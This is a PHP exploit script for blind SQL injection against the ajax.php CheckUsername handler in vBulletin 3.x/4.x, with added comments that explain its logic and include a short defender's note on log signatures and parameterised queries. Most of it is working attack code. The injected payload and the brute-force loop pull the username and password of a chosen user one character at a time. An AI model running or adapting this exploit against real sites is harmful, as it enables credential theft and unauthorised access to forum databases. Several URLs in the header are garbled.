
vBulletin 3.x / 4.x AjaxReg SQL注射及修复 - 网站安全

#!/usr/bin/php

<?

 

# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit

# https://lh3.googleusercontent测试数据/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png

# livedemo : http://HdhCmsTestyoutube测试数据/watch?v=LlKaYyJxH7E

# check it : http://HdhCmsTest2cto测试数据 /vBulletin/clientscript/register.js

 

# Prints the command-line help text to stdout and terminates the process.
# Never returns: exit() is called unconditionally after the echo, so any
# caller (here: the argv-count check at the bottom of the file) stops there.
function usage ()

{

    echo

        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".

        "\n[+] Author: Cold z3ro".

        "\n[+] Site  : http://HdhCmsTesthackteach.org | http://HdhCmsTests3curi7y测试数据".

        "\n[+] vandor: http://HdhCmsTestvbulletin.org/forum/showthread.php?t=144869".

        "\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".

        "\n[+] Ex.   : php 0day.php localhost /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".

        "\n[+] Note. : Its a 0day exploit\n\n";

    # Terminates the script; the help text above is the only output.
    exit ();

}

 

# Single boolean-oracle probe against the target's ajax.php CheckUsername
# handler: asks whether character $pos (1-based) of column $field for
# userid $usid has the ASCII code of $char.
#   $hostname, $path  - concatenated verbatim with the query string to form
#                       the request URL (no scheme handling or escaping here)
#   $field            - column name interpolated into the injected SELECT
#   $pos              - substring offset interpolated into the query
#   $usid             - userid interpolated into the WHERE clause
#   $char             - one candidate character; converted to its code below
# Returns true when the captured response (headers included, see
# CURLOPT_HEADER) contains the text 'Invalid' case-insensitively; the caller
# treats that as "the injected comparison held". Any other response,
# including a transport failure (curl_exec's return value is not checked),
# yields false.
# Defender's note: every probe carries the constant prefix
# "ajax.php?do=CheckUsername&param=admin'" followed by "ascii(substring((SELECT"
# in the URL, which is a straightforward access-log / WAF signature. The
# underlying weakness is the 'param' value reaching SQL by string
# concatenation; the mitigation is server-side validation and a
# parameterised query for that value.
function check ($hostname, $path, $field, $pos, $usid, $char)

{

    # The comparison is done on the ASCII code, not the raw character.
    $char = ord ($char);

    $inj = 'ajax.php?do=CheckUsername&param=';

  # Injected predicate; '/*' at the end comments out the rest of the original query.
  $inj.= "admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";

  # (sic: $culr) full request URL = hostname + path + query string.
  $culr = $hostname.$path.$inj;

  $curl = curl_init();

  curl_setopt ($curl, CURLOPT_URL, $culr );

  # Response headers are included in the output that gets captured below.
  curl_setopt($curl, CURLOPT_HEADER, 1);

  curl_setopt($curl, CURLOPT_VERBOSE, 0);

    # CURLOPT_RETURNTRANSFER is not set, so curl_exec() prints the response;
    # output buffering captures it into $con instead of letting it reach stdout.
    ob_start();

    curl_exec ($curl);

    curl_close ($curl);

    $con = ob_get_contents();

    ob_end_clean();

  # eregi(): case-insensitive POSIX regex match (removed in PHP 7.0).
  # The presence of 'Invalid' anywhere in headers+body is the oracle signal.
  if(eregi('Invalid',$con))

      return true;

    else

        return false;

}

 

 

# Recovers one column value for one user character by character, echoing
# each character as soon as check() confirms it. No return value.
#   $hostname, $path, $field, $usid - passed straight through to check()
#   $key                            - candidate alphabet, tried in order
# Loop shape: $chr walks the alphabet for the current $pos. On a hit the
# character is printed, $chr is set to -1 (the trailing $chr++ brings it
# back to 0, restarting the alphabet) and $pos advances. The loop ends when
# a complete pass over the alphabet produces no hit at the current position,
# i.e. the value is exhausted or contains a character outside $key.
# Detection note: this costs up to strlen($key) requests per recovered
# character, all to the same ajax.php URL differing only in the substring
# offset and the compared ASCII code -- a dense, easily recognisable burst
# in access logs.
function brutechar ($hostname, $path, $field, $usid, $key)

{

    # 1-based character position within the column value.
    $pos = 1;

    # Index into the candidate alphabet $key.
    $chr = 0;

    while ($chr < strlen ($key))

    {

        if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))

        {

            echo $key [$chr];

            # Restart the alphabet for the next position (incremented to 0 below).
            $chr = -1;

            $pos++;

        }

        $chr++;

    }

}

 

 

# Script entry point: argument handling, then one brute-force pass per column.
# count($argv) must be exactly 4: script name, hostname, path, userid.
# usage() exits, so execution only continues with exactly those arguments.
if (count ($argv) != 4)

    usage ();

 

$hostname = $argv [1];

$path = $argv [2];

$usid = $argv [3];

# With exactly four argv entries this index is never present, so the
# default alphabet below is always what brutechar() ends up using.
$key = $argv [4];

if (empty ($key))

    $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

 

# First pass: the 'username' column; second pass: the 'password' column.
# Each pass prints its result inline as characters are confirmed.
echo "[+] Username: ";

brutechar ($hostname, $path, "username", $usid, $key);

echo "\n[+] Password: ";

brutechar ($hostname, $path, "password", $usid, $key);

echo "\n[+] Done..";

echo "\n[+] It's not fake, its real.";

# word to 1337day测试数据, stop scaming me

 

?>
